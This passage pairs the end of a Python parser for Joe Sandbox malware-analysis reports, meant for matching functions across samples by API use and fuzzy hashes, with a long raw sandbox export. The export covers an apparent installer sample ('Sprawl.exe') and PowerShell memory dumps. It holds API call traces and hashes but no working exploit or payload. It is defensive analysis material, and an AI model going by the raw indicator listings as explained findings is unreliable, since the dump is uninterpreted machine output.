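        return (self.similarity.get("API String ID", ""),
                self.similarity.get("Instruction Fuzzy Hash", ""))


HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
LINK_RESIDUE = "Download File"   # link label the HTML export glues onto dump names
API_RE = re.compile(r"^(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(r"^Source File: (?P<file>\S+), Offset: (?P<off>[0-9A-Fa-f]+)")


def parse_blocks(text):
    """Split report text into FunctionBlock records; a new block starts at each 'APIs' heading."""
    blocks, section, cur = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith(LINK_RESIDUE):
            line = line[:-len(LINK_RESIDUE)].rstrip()
        if line in HEADINGS:
            if line == "APIs":
                cur = FunctionBlock()
                blocks.append(cur)
            section = line
            continue
        if cur is None or not line.startswith("•"):
            continue
        item = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(item)
            if m:   # wsprintfA-style entries carry no argument list; args stays empty
                args = [a for a in (m["args"] or "").split(",") if a]
                cur.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16)))
        elif section == "Memory Dump Source":
            m = SOURCE_RE.match(item)
            if m:   # only the primary dump carries an offset; 'Associated' lines are skipped
                cur.source_file, cur.image_base = m["file"], int(m["off"], 16)
        elif section == "Similarity":
            key, _, value = item.partition(":")
            cur.similarity[key.strip()] = value.strip()
    return blocks


def functions_calling(blocks, required):
    """Blocks whose import set covers every API name in `required`."""
    required = set(required)
    return [b for b in blocks if required <= b.api_names()]


if __name__ == "__main__":
    for b in functions_calling(parse_blocks(SAMPLE), {"RegEnumKeyA", "RegDeleteKeyA"}):
        print(f"registry enumerate+delete routine at {b.apis[0].ref:#010x}:", b.pivot_key())
```

The parser keys on the section headings the report already uses, so the same code runs over any number of concatenated function blocks; the pivot key pairs the API String ID with the Instruction Fuzzy Hash because the former changes whenever the string set changes while the latter survives small code differences, which is what makes it useful for matching a stub across samples.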
APIs
• lstrlenA.KERNEL32(00429868,00429868,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
• wsprintfA.USER32 ref: 004047AF
• SetDlgItemTextA.USER32(?,00429868), ref: 004047C2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s
• API String ID: 3540041739-3551169577
• Opcode ID: 1472cf9e36570b38fa99e832c46bb30f5d20a58f0764e004e3f2a6e79c89f0d0
• Instruction ID: 053aaa49463ee093dad042f908cd6657d31450f6c5b0c7846562dfb37f065ee1
                                                                                                                            • Opcode Fuzzy Hash: 1472cf9e36570b38fa99e832c46bb30f5d20a58f0764e004e3f2a6e79c89f0d0
                                                                                                                            • Instruction Fuzzy Hash: 0E11E473A041283BDB0065A99C45EAF3288DB82374F254237FA25F71D1EA78CC1286A8
                                                                                                                            APIs
                                                                                                                            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057A7
                                                                                                                            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057B0
                                                                                                                            • lstrcatA.KERNEL32(?,00409014), ref: 004057C1
                                                                                                                            Strings
                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004057A1
Similarity
• API ID: CharPrevlstrcatlstrlen
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 2659869361-3936084776
• Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
• Instruction ID: 31daa9478c60f2ec517fa6cf0afa0cd81b34b06dfe81de980877f4a94ee531a8
• Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
• Instruction Fuzzy Hash: 8ED0A762505D306BE21226155C09D8B2A08CF12740B044027F100B61E1C63C4D414FFD
APIs
• DestroyWindow.USER32(00000000,00000000,00402DE2,00000001), ref: 00402C15
• GetTickCount.KERNEL32 ref: 00402C33
• CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
• ShowWindow.USER32(00000000,00000005), ref: 00402C5E
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• String ID:
• API String ID: 2102729457-0
• Opcode ID: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
• Instruction ID: 1b84634240e2166e3851fbc92cd381e461e1db94d3428fd6ef6110bf0b183a31
• Opcode Fuzzy Hash: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
• Instruction Fuzzy Hash: 97F05E30A09220EFD6317B20FE4CD9F7BA4BB04B15B404976F104B11EAC7782882CB9D
APIs
• FreeLibrary.KERNEL32(?,76233410,00000000,C:\Users\user\AppData\Local\Temp\,004035F2,0040340C,?), ref: 00403634
• GlobalFree.KERNEL32(00000000), ref: 0040363B
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 0040361A
Similarity
• API ID: Free$GlobalLibrary
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 1100898210-3936084776
• Opcode ID: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
• Instruction ID: 1a9bfca33d817e772708c534a1c0ef1eeb9da564593c1c7aee7843147688a1a4
• Opcode Fuzzy Hash: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
• Instruction Fuzzy Hash: 60E08C329050606BC6316F15ED04B2E76A9AB48B22F42006AEA407B3A08B756C424BCC
APIs
• lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Sprawl.exe,C:\Users\user\Desktop\Sprawl.exe,80000000,00000003), ref: 004057EE
• CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Sprawl.exe,C:\Users\user\Desktop\Sprawl.exe,80000000,00000003), ref: 004057FC
Similarity
• API ID: CharPrevlstrlen
• String ID: C:\Users\user\Desktop
• API String ID: 2709904686-3125694417
• Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
• Instruction ID: 563d0c8124584ba78a4db43b9ec919a88ee2b9567cf051c7da1bb821b6b33a35
• Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
• Instruction Fuzzy Hash: 48D0A773808D705FF34362109C04B8F6B48CF12740F094062E140A71D0C2780C414BBD
APIs
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
• lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040592F
• CharNextA.USER32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405940
• lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
Similarity
• API ID: lstrlen$CharNextlstrcmpi
• String ID:
• API String ID: 190613189-0
• Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
• Instruction ID: 9438e9cad6691fea7f13f8d56426e11099e03f26c07faecbb185dc05f13043cf
• Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
• Instruction Fuzzy Hash: D5F06236505518FFCB129FA5DC00D9EBBA8EF16360B2540B9F800F7350D674EE01ABA9

Execution Graph

Execution Coverage: 3.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 16.7%
Total number of Nodes: 24
Total number of Limit Nodes: 3

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2786477517.000000000B78B000.00000040.00001000.00020000.00000000.sdmp, Offset: 0B78B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_b78b000_powershell.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ResumeThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 947044025-0
                                                                                                                            • Opcode ID: 2a3a006607e5e828a537991fca93b5330f4120939df3164094c71d549461c120
                                                                                                                            • Instruction ID: 370c62671592c4f5557668a087fb16b2ff947600cbcfb68fa56ff1e766c57567
                                                                                                                            • Opcode Fuzzy Hash: 2a3a006607e5e828a537991fca93b5330f4120939df3164094c71d549461c120
                                                                                                                            • Instruction Fuzzy Hash: FE015E7564064A8FDF35EE78C8983CE3763EF99354FA08439D88A8B648D735958ACB01
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2725590394.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_4d20000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: aa0aa3d0513a1b1798f479a0fe2ab0652f75998ab83c20da7c9d94fe94c0e297
                                                                                                                            • Instruction ID: 7a43867ba9c419af1e0df945e9a9ae3423f5b14707525559cd7a24b0b17933a1
                                                                                                                            • Opcode Fuzzy Hash: aa0aa3d0513a1b1798f479a0fe2ab0652f75998ab83c20da7c9d94fe94c0e297
                                                                                                                            • Instruction Fuzzy Hash: E152BF34B00229CFDB24CF24C9547ADBBB2BF95709F1045AAE949E7250EB70AD85CF51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2762149689.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ec83c1abf56c3746deeb2f51f0c2315c89baa00604ff776c5d354cb92f9b41b9
                                                                                                                            • Instruction ID: eb20424b9cd080f685734b76e5c8d841b6b1cd401e3ab19dd4ebc062cd1c9ed3
                                                                                                                            • Opcode Fuzzy Hash: ec83c1abf56c3746deeb2f51f0c2315c89baa00604ff776c5d354cb92f9b41b9
                                                                                                                            • Instruction Fuzzy Hash: 4C926DB0A00305DFD714CB98C455B9ABBB2FF89714F258069E909AF751CB76EC82CB91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2762149689.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2680d78b8db22d4ccc6e589e5275ffc9c4b37a0345c123beb91837fdb33d193f
                                                                                                                            • Instruction ID: 9f8f581eddb5db33de60616617c501f387b63bfe4c04bccb178f810bd30dad42
                                                                                                                            • Opcode Fuzzy Hash: 2680d78b8db22d4ccc6e589e5275ffc9c4b37a0345c123beb91837fdb33d193f
                                                                                                                            • Instruction Fuzzy Hash: C4725DB4A00305DFDB14CB98C445B9AB7B2FF89714F258459E909AF391CB76EC82CB91

                                                                                                                            Control-flow Graph

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2762149689.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: bf224f50946ce0ad3f012fae09d59a313595ac593160e6e2a7512f5348177aa1
                                                                                                                            • Instruction ID: 49f1300827e5756d0c76f753daf85d9b23ce38f04aa706403f74104b650b2ed0
                                                                                                                            • Opcode Fuzzy Hash: bf224f50946ce0ad3f012fae09d59a313595ac593160e6e2a7512f5348177aa1
                                                                                                                            • Instruction Fuzzy Hash: D06291B0A00219CFDB14DF68C854BAABBB2FF95354F1080A9D909AB751DB72DD81CF91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2762149689.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2dd257377f5eeb21f9502455d2054a3f2e5f939be9e91fd746ef2dda0d804679
                                                                                                                            • Instruction ID: 286109fb6b0f816b6350c48529b51d937be5963ed776c518803783f01f9a9d99
                                                                                                                            • Opcode Fuzzy Hash: 2dd257377f5eeb21f9502455d2054a3f2e5f939be9e91fd746ef2dda0d804679
                                                                                                                            • Instruction Fuzzy Hash: F7527DB4B00215DFDB10DB58C844F99BBB2BF88748F14C4D8E909AB751DB72ED828B61
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2762149689.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a5933267d908922c46a7fad942e44fc48f3f3b2673275b47de986f309956687d
                                                                                                                            • Instruction ID: cc5dfdc51c4ea8e64e28da3f61df417cdac2207931f0d8d11fe79cac95cc6e34
                                                                                                                            • Opcode Fuzzy Hash: a5933267d908922c46a7fad942e44fc48f3f3b2673275b47de986f309956687d
                                                                                                                            • Instruction Fuzzy Hash: 09425FB4B00215DFD754DB58CC50BAAB7A2BFC9744F148099E909AF391CB72ED828F91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2762149689.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d05036deb115f80da46fc24dc4cd5b756da8579052e77901b7b428ed63256bef
                                                                                                                            • Instruction ID: e88b02e36d8d86222150ee5696d8e5077be572e70d172d29ff7b20541df1e258
                                                                                                                            • Opcode Fuzzy Hash: d05036deb115f80da46fc24dc4cd5b756da8579052e77901b7b428ed63256bef
                                                                                                                            • Instruction Fuzzy Hash: 9C428EB0B00215DFDB14DB58C854B99BBB2BFC8744F1084A9E908AF791DB71ED82CB61
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2762149689.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 460ad7f00b3550f38de39ea12b61ad4719efd22f5e81a774b6d3f574188794f4
                                                                                                                            • Instruction ID: 59e20ea6fc5d6f791dd6a550e0fca5a2784926bb2c56431da9f64606920db830
                                                                                                                            • Opcode Fuzzy Hash: 460ad7f00b3550f38de39ea12b61ad4719efd22f5e81a774b6d3f574188794f4
                                                                                                                            • Instruction Fuzzy Hash: E6327EB0F00209DFD714CB98C448BAABBE2AF99B54F148069E905EF751DB72EC41CB91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2762149689.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f2968e11c3d684119d9f35a527d770a1c0fd1ac548c7afc048d0ec736564e73d
                                                                                                                            • Instruction ID: 473a9fd5ab5165bb8314f16d177bf9e1d3fe608bc9d2e2148f77a057a94a7aeb
                                                                                                                            • Opcode Fuzzy Hash: f2968e11c3d684119d9f35a527d770a1c0fd1ac548c7afc048d0ec736564e73d
                                                                                                                            • Instruction Fuzzy Hash: 73225DB0B00215DFD754DB58CC54F9ABBA2AFC9754F108099E909AF391CB72ED828F91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2762149689.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2495576f17350990ace58974a151ebf62154ab9b8f47995f89e6039cf86a70c7
                                                                                                                            • Instruction ID: 50e72d6312b3435ffe9bbbbb537aeeb6c81023a3c3ca97b98739a80988c69d57
                                                                                                                            • Opcode Fuzzy Hash: 2495576f17350990ace58974a151ebf62154ab9b8f47995f89e6039cf86a70c7
                                                                                                                            • Instruction Fuzzy Hash: EB226CB4A00215DFDB10DB58C844F99BBB2FF88754F1484D8E909AB791DB72ED828F61
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2762149689.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 07d9d12088fd12e5d22805d8cd053bb4b43d7c97d23789fffeda840c3cbf8f9b
                                                                                                                            • Instruction ID: ae3dee68f4a3d17e5131a7073a42fec5064542a50d9c73594388a5ae3958faaf
                                                                                                                            • Opcode Fuzzy Hash: 07d9d12088fd12e5d22805d8cd053bb4b43d7c97d23789fffeda840c3cbf8f9b
                                                                                                                            • Instruction Fuzzy Hash: F8415A74A00219CFCB09CF59C594AAEFBB1FF48314B1586A9E905AB364C732FD51CBA0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2725590394.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_4d20000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 69bcc8e981d534e90b05c0751c1749b043a0535cb623e7e91e97539a9cb3a53e
                                                                                                                            • Instruction ID: f8320e3e947140497d9a33c6ff381c37d8b4126a5940bbd0783bfd1cb33d1a3c
                                                                                                                            • Opcode Fuzzy Hash: 69bcc8e981d534e90b05c0751c1749b043a0535cb623e7e91e97539a9cb3a53e
                                                                                                                            • Instruction Fuzzy Hash: 21413F34A00215DFDB28DB64C654AAEBBF6BF88754F14446CD406AB7A0DF34AD41CB90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2762149689.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 008e2b52e23fe565d71ce3990e978fc8da357ffe030fb3350ea8a6021ed7e427
                                                                                                                            • Instruction ID: 40558be247db63139460269408ed06f61f52e60199450c78f3370024a4b42cec
                                                                                                                            • Opcode Fuzzy Hash: 008e2b52e23fe565d71ce3990e978fc8da357ffe030fb3350ea8a6021ed7e427
                                                                                                                            • Instruction Fuzzy Hash: 4131A570B00254DBE704A7A4C854FAE7AA3EFC9754F648424E901BF791CFB5DC428BA1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2762149689.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 199f61439ead30f450726dfd6518fccbcd4a58324b7f269dc865a2babfba5724
                                                                                                                            • Instruction ID: e19540d30f3712e7afc5e84af867808c08d821a5424d66d659dc65c1edc7579a
                                                                                                                            • Opcode Fuzzy Hash: 199f61439ead30f450726dfd6518fccbcd4a58324b7f269dc865a2babfba5724
                                                                                                                            • Instruction Fuzzy Hash: 65217DB130031A9BDB249ABA4850B3BB68AAFD5715F24843AE905DB3C5DE75C841C3A1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2762149689.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 95551149d0ef2f58322df949db0d8a5b5ae583ef6ddbaf903ce618294f80eb2f
                                                                                                                            • Instruction ID: a849db064e6acfeb6fe294d9f453c121ed6b9ff5e262cf461b565b22a1d20b1b
                                                                                                                            • Opcode Fuzzy Hash: 95551149d0ef2f58322df949db0d8a5b5ae583ef6ddbaf903ce618294f80eb2f
                                                                                                                            • Instruction Fuzzy Hash: CD2179B1B0028E9BEB3459BA8848B76B69A9BD1715F30842AD905C7381DD75C8418361
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2762149689.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 993011507fdb3ec642718ca236f2ae14c20e5a41207370c8567f316bd1e907c9
                                                                                                                            • Instruction ID: 68b866f79a55b86bdda91f4d22e7a237640ef6cced4f5119d74e1a816b317b25
                                                                                                                            • Opcode Fuzzy Hash: 993011507fdb3ec642718ca236f2ae14c20e5a41207370c8567f316bd1e907c9
                                                                                                                            • Instruction Fuzzy Hash: 58216DF1604342DFD7209F6498017BA7BA3AF86684F4840A6EC44DF691EB35D951C7F2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2762149689.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 83ff337f646f25dad0bab59731f1aad7823fea23d57301122ce9b799bcf0122a
                                                                                                                            • Instruction ID: dfa0ff229e2606fa4383a55ff5d65cbe64ccc9fe098e7f917d81e505bd8d44e6
                                                                                                                            • Opcode Fuzzy Hash: 83ff337f646f25dad0bab59731f1aad7823fea23d57301122ce9b799bcf0122a
                                                                                                                            • Instruction Fuzzy Hash: 0F21ADB1304349AFDB214AB64850BB67B95DFC6714F28806BED40DB2CADA79DC40C3B2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2762149689.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9025525450f68aebb4b27b14b8e7112ab250c2d800126e037ae6c71304cc8028
                                                                                                                            • Instruction ID: 2d215e037b15e034db6416ef33c684ebee9ac2c5d098dbc6c79f344c5323bfbb
                                                                                                                            • Opcode Fuzzy Hash: 9025525450f68aebb4b27b14b8e7112ab250c2d800126e037ae6c71304cc8028
                                                                                                                            • Instruction Fuzzy Hash: 042105F67002569BC7245F6A8890527FB99FFE1275728847ADC49C7246CE32DC41C360
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2762149689.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5e8a95b0c8b313d24c3de0601965da8dbc5e7705022628763ab70218097af82a
                                                                                                                            • Instruction ID: 4e4b81902ff299466231802a026407d2b0a23a3b181683ed56bb93e3ae90f567
                                                                                                                            • Opcode Fuzzy Hash: 5e8a95b0c8b313d24c3de0601965da8dbc5e7705022628763ab70218097af82a
                                                                                                                            • Instruction Fuzzy Hash: 51113BB1B043CEABEB304D668C48BB67BA55FD2A50F248467ED44DB286D679C844C361
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2762149689.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1162ae73160d68fcf1a9f1463d1c4d57317e7ededdb989ec07257025910cbfee
                                                                                                                            • Instruction ID: 6d7c68361c7b2e380a09ed6edd0f38aadfa257a4df4d62060d83d1e382b3574d
                                                                                                                            • Opcode Fuzzy Hash: 1162ae73160d68fcf1a9f1463d1c4d57317e7ededdb989ec07257025910cbfee
                                                                                                                            • Instruction Fuzzy Hash: 111155F6104389AFCB140F6948901A6BF6CFFA216173D42A7DC08CB157CA31AC45C3A2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2725590394.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_4d20000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 15417a269c016e0d8fa871d4ea14c25355189fc7e5a77930ac7eee0108405f91
                                                                                                                            • Instruction ID: 5f7c1e83d109ca26fb51a4d20afdac6e6254ce68d6139a6217ce72bdda501df4
                                                                                                                            • Opcode Fuzzy Hash: 15417a269c016e0d8fa871d4ea14c25355189fc7e5a77930ac7eee0108405f91
                                                                                                                            • Instruction Fuzzy Hash: 3E214AB4A002098FCB00DF98C990AAEBBB1FF49310F158499D949AB352C731ED01CBA1
                                                                                                                            Memory Dump Source
